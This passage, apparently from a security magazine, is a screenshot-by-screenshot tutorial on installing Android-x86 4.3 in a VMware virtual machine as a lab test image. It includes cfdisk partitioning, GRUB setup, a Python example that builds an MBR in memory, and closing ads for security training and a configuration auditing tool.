Figure 4. Choosing the installation path 
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Step 5. 

Set the size of the virtual disk (at least 2 GB; more leaves room for apps and data) and click Next (Figure 5).

[Screenshot: Specify Disk Capacity. How large do you want this disk to be? The virtual machine's hard disk is stored as one or more files on the host computer's physical disk. These file(s) start small and become larger as you add applications, files, and data to your virtual machine. Maximum disk size (GB): 20.0. Recommended size for FreeBSD: 20 GB. Store virtual disk as a single file / Split virtual disk into multiple files (selected). Splitting the disk makes it easier to move the virtual machine to another computer but may reduce performance with very large disks. Annotation: resize the disk; at least 2 GB, more is better. Buttons: Help, < Back, Next >, Cancel.]



Figure 5. Changing your disk size 

Step 6. 

Click Finish (Figure 6). The summary lists the guest operating system as FreeBSD because the wizard could not identify Android-x86; this is harmless. Use Customize Hardware if you want more than the default 256 MB of memory (1 GB is a comfortable choice) before the VM is powered on.



[Screenshot: Ready to Create Virtual Machine. Click Finish to create the virtual machine and start installing FreeBSD. The virtual machine will be created with the following settings: Name: Android 4.3; Location: C:\Users\Musthiaib\Documents\Virtual Machines\A (truncated); Version: Workstation 9.0; Operating System: FreeBSD; Hard Disk: 20 GB, Split; Memory: 256 MB. Customize Hardware... (annotation: you can customize hardware here, e.g. choose 1 GB of RAM). Power on this virtual machine after creation (checked). Buttons: < Back, Finish, Cancel.]



Figure 6. Finishing creating the VM 
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Step 7. 



After the VM boots from the ISO, a menu similar to Figure 7 appears. Select Installation - Install Android-x86 to harddisk (Figure 7).



[Screenshot: Android-x86 boot menu: Live CD - Run Android-x86 without installation; Live CD - VESA mode; Live CD - Debug mode; Installation - Install Android-x86 to harddisk (selected).]




Figure 7. Starting the installation of the OS 

Step 8. 

Select Create/Modify partitions and click OK (Figure 8). 





Figure 8. Creating or modifying partitions 
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Step 9. 

Select New (Figure 9). 



cfdisk (util-linux-ng 2.14.1)

Disk Drive: /dev/sda
Size: 21474836480 bytes, 21.4 GB
Heads: 255   Sectors per Track: 63   Cylinders: 2610

Flags   Part Type   FS Type      [Label]   Size (MB)
        Pri/Log     Free Space             21467.99

[ Help ]  [ New ]  [ Print ]  [ Quit ]  [ Units ]  [ Write ]
Create new partition from free space



Figure 9. Creating a new partition 

Step 10.

Select Primary (Figure 10). 



cfdisk (util-linux-ng 2.14.1)

Disk Drive: /dev/sda
Size: 8589934592 bytes, 8589 MB
Heads: 255   Sectors per Track: 63   Cylinders: 1044

Flags   Part Type   FS Type      [Label]   Size (MB)
        Pri/Log     Free Space             8587.28

[ Primary ]  [ Logical ]  [ Cancel ]
Create a new primary partition.



Figure 10. Creating a primary partition 



55 



Kali Linux 



Step 11.



Accept the default size (the whole free space) and press Enter (Figure 11).



cfdisk (util-linux-ng 2.14.1)

Disk Drive: /dev/sda
Size: 21474836480 bytes, 21.4 GB
Heads: 255   Sectors per Track: 63   Cylinders: 2610

Flags   Part Type   FS Type      [Label]   Size (MB)
        Pri/Log     Free Space             21467.99




Figure 11. Default settings 



Step 12.

Now select Write and press Enter (Figure 12). 



cfdisk (util-linux-ng 2.14.1)

Disk Drive: /dev/sda
Size: 21474836480 bytes, 21.4 GB
Heads: 255   Sectors per Track: 63   Cylinders: 2610

Flags   Part Type   FS Type      [Label]   Size (MB)
sda1    Primary     Linux                  21467.99

[ Bootable ]  [ Delete ]  [ Help ]  [ Maximize ]  [ Print ]
[ Quit ]      [ Type ]    [ Units ]  [ Write ]
Write partition table to disk (this might destroy data)



Figure 12. Selecting the Write option 



Step 13. 



Type yes and press Enter (Figure 13). This is the moment the partition table is actually written; on a freshly created virtual disk there is nothing to lose.
Are you sure you want to write the partition table to disk? (yes or no):
Warning!! This may destroy data on your disk!



Figure 13. Writing the partition table to disk 



Step 14.

Select Quit and press Enter (Figure 14). The status line says that quitting does not write the partition table; that is fine here because the table was already written in the previous step.



[ Bootable ]  [ Delete ]  [ Help ]  [ Maximize ]  [ Print ]
[ Quit ]      [ Type ]    [ Units ]  [ Write ]
Quit program without writing partition table



Figure 14. Quitting the program without writing partition table 
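Steps 9 to 14 record a single primary Linux partition in the disk's MBR: cfdisk's New / Primary / Write sequence writes one 16-byte entry in sector 0 plus the 0x55AA signature, nothing more. The Python below is an added example, not code from the article, from cfdisk or from Android-x86: it builds that same MBR for a constructed in-memory disk image using the geometry the screenshots show (255 heads, 63 sectors per track, partition starting at sector 63 and ending on a cylinder boundary, type 0x83 Linux), reads it back, and reports the size cfdisk would display. The function names and the 8 MiB sample image are assumptions.

```python
"""Write and read back the MBR that cfdisk's New -> Primary -> Write produces.

Added example for this article, not cfdisk or Android-x86 code.  The "disk" is
a constructed bytes object; the geometry matches the cfdisk screenshots
(255 heads, 63 sectors/track), and like cfdisk of that era the partition
starts at sector 63 and ends on a cylinder boundary.
"""
import struct

SECTOR = 512
HEADS, SPT = 255, 63               # geometry shown in the cfdisk header
CYL = HEADS * SPT                  # sectors per cylinder (16065)
LINUX = 0x83                       # cfdisk's default type "Linux"
BOOT_FLAG = 0x80


def lba_to_chs(lba):
    """3-byte CHS encoding of an LBA, clamped to 1023/254/63 when out of range,
    which is what partition tools do for disks beyond the CHS limit."""
    c, rem = divmod(lba, CYL)
    h, s = divmod(rem, SPT)
    s += 1                                     # CHS sectors are 1-based
    if c > 1023:
        c, h, s = 1023, 254, 63
    return bytes([h, ((c >> 8) << 6) | s, c & 0xFF])


def make_mbr(disk_sectors, start_lba=63, bootable=False, ptype=LINUX):
    """Return sector 0 with one primary partition filling the last full cylinder."""
    end = (disk_sectors // CYL) * CYL          # cylinder-aligned end (exclusive)
    size = end - start_lba
    if size <= 0:
        raise ValueError("disk too small for one cylinder-aligned partition")
    entry = (bytes([BOOT_FLAG if bootable else 0]) + lba_to_chs(start_lba)
             + bytes([ptype]) + lba_to_chs(end - 1)
             + struct.pack("<II", start_lba, size))
    mbr = bytearray(SECTOR)
    mbr[446:462] = entry                       # slot 1; slots 2-4 stay empty
    mbr[510:512] = b"\x55\xAA"                 # boot signature
    return bytes(mbr)


def parse_mbr(sector0):
    """Decode the four entries of sector 0 the way cfdisk lists them."""
    if len(sector0) < SECTOR or sector0[510:512] != b"\x55\xAA":
        raise ValueError("no MBR signature")
    parts = []
    for i in range(4):
        e = sector0[446 + 16 * i:462 + 16 * i]
        if e[4] == 0:                          # empty slot
            continue
        start, size = struct.unpack("<II", e[8:16])
        parts.append({"index": i + 1, "bootable": e[0] == BOOT_FLAG,
                      "type": e[4], "start_lba": start, "sectors": size,
                      "size_mb": size * SECTOR / 1e6})
    return parts


def cfdisk_like_write(disk_image, bootable=False):
    """Emulate New -> Primary -> default size -> Write on an empty disk image."""
    disk = bytearray(disk_image)
    disk[:SECTOR] = make_mbr(len(disk) // SECTOR, bootable=bootable)
    return bytes(disk)


if __name__ == "__main__":
    # The 21.4 GB /dev/sda from the screenshots, expressed in sectors
    for p in parse_mbr(make_mbr(21474836480 // SECTOR)):
        print(p)
    # A small constructed 8 MiB image to run the same code over real bytes
    print(parse_mbr(cfdisk_like_write(bytes(8 * 1024 * 1024))))
```

For the 21474836480-byte disk the partition covers 2610 cylinders minus the first track, about 21467.95 MB, which is within rounding of the 21467.99 MB cfdisk shows. The bootable flag is left clear, as cfdisk leaves it; the Android-x86 installer handles booting by installing GRUB in a later step.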



Step 15.



Select sda1 and press Enter (Figure 15).




Figure 15. Selecting sdal 



Step 16.

Select ext3 and press Enter (Figure 16). 
Choose filesystem
Please select a filesystem to format sda1:
  Do not format
  ext3
  ext2
  ntfs
  fat32
< OK >   <Cancel>



Figure 16. Selecting a filesystem to format sdal 



Step 17.



Select Yes and press Enter (Figure 17). 




Figure 17. Confirming formatting 



Step 18.



Select Yes and press Enter (Figure 18). 




Confirm
Do you want to install boot loader GRUB?



Figure 18. Installing GRUB 
Step 19.



Select Yes and press Enter (Figure 19). A read-write /system lets you change system files for debugging and testing, which is what you want in a lab VM; it costs more disk space and a longer installation, and it is not how a production device is configured, so treat the result as a test image.




Question
Do you want to install /system directory as read-write?
Making /system be read-write is easier for debugging, but it needs more disk space and longer installation time.



Figure 19. Installing /system directory as read-write 



Step 20. 



Select Run Android-x86 and press Enter (Figure 20). 




Congratulations!
Android-x86 is installed successfully.



Figure 20. Running Android -x86 



Step 21.



Booting starts (Figure 21); be aware that it takes some time.




Figure 21. Boot screen 
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Step 22. 

Select the language and click Start (Figure 22). 



[Screenshot: Welcome screen with the language selector showing English (United States), a Start button and an Emergency call link.]



Figure 22. Language choice screen 

Step 23. 

It takes some time to load (Figure 23). 



[Screenshot: Welcome screen with the "Just a sec..." loading message.]




Figure 23. Loading 



Step 24. 

You can select the available network or just click Skip (Figure 24). 



[Screenshot: Select Wi-Fi, with the list of networks, "+ Other network" and a Skip button.]




Figure 24. Choosing the network 
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Step 25. 

Select Yes to set up your Google account now, or No to set it up later (Figure 25).



[Screenshot: Got Google? Do you have a Google Account? If you use Gmail or Google Apps, answer Yes.]




Figure 25. Setting up your Google account 

Step 26. 



Set the time and date. Then, click on the arrow (Figure 26). 



[Screenshot: Date & time screen with Current date and Current time fields; annotation: click the arrow.]







Figure 26. Setting date and time 



Step 27. 

Provide the username and click on the arrow (Figure 27). 
[Screenshot: "This tablet belongs to..." The tablet uses your name to personalize some apps. Name field, with the arrow annotated "Click Here".]





Figure 27. Providing the username 



Step 28. 



The desktop screen will appear (Figure 28). 




Figure 28. Desktop screen 



Step 29. 

You can take a look at the default applications (Figure 29). 






[Screenshot: Android app drawer with the APPS / WIDGETS / SHOP tabs, showing the default applications.]
Figure 29. Default applications 



Step 30. 



You can check your Android version in Settings > About tablet (Figure 30).







[Screenshot: Settings with About tablet selected. Left column: Location access, Language & input, Backup & reset, Accounts (+ Add account), Accessibility, About tablet, Power off. Right column: System updates, Status, Legal information, Android version, Baseband version, Kernel version, OpenGL driver version.]





Figure 30. Checking your Android version 






ANRC




A Cyber criminal can target and breach 
your organization's perimeter in less than 
a second from anywhere in the world ... 

Are You Prepared? 

ANRC delivers advanced cyber security training, consulting, and development services 
that provide our customers with peace of mind in an often confusing cyber security environment. 
ANRC's advanced security training program utilizes an intensive hands-on laboratory method 
of training taught by subject matter experts to provide Information Security professionals with 
the knowledge and skills necessary to defend against today's cyber-attacks and tomorrow's 
emerging threats. 

ANRC's consulting and development services leverage team member knowledge and experience 
gained in the trenches while securing critical networks in the U.S. Department of Defense and 
large U.S. corporations. ANRC tailors these services to deliver computer security solutions specific 
to the needs of the customer's operational environment. Our approach emphasizes a close relationship 
with our clients as an integral part of our service. We believe we're all in the security battle together, 
and we view our customers as key members of our team in the fight. 



TRAINING :: CONSULTING :: SOLUTIONS w.anrc-services.com 
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Titania's award winning Nipper Studio configuration 
auditing tool is helping security consultants and end- 
user organizations worldwide improve their network 
security. Its reports are more detailed than those typically 
produced by scanners, enabling you to maintain a higher 
level of vulnerability analysis in the intervals between 
penetration tests. 

Now used in over 45 countries, Nipper Studio provides a 
thorough, fast & cost effective way to securely audit over 
100 different types of network device. The NSA, FBI, DoD 
& U.S. Treasury already use it, so why not try it for free at 
www.titania.com 
Enterprise Security Solution of the Year
WINNER
Network Security Solution of the Year

www.titania.com



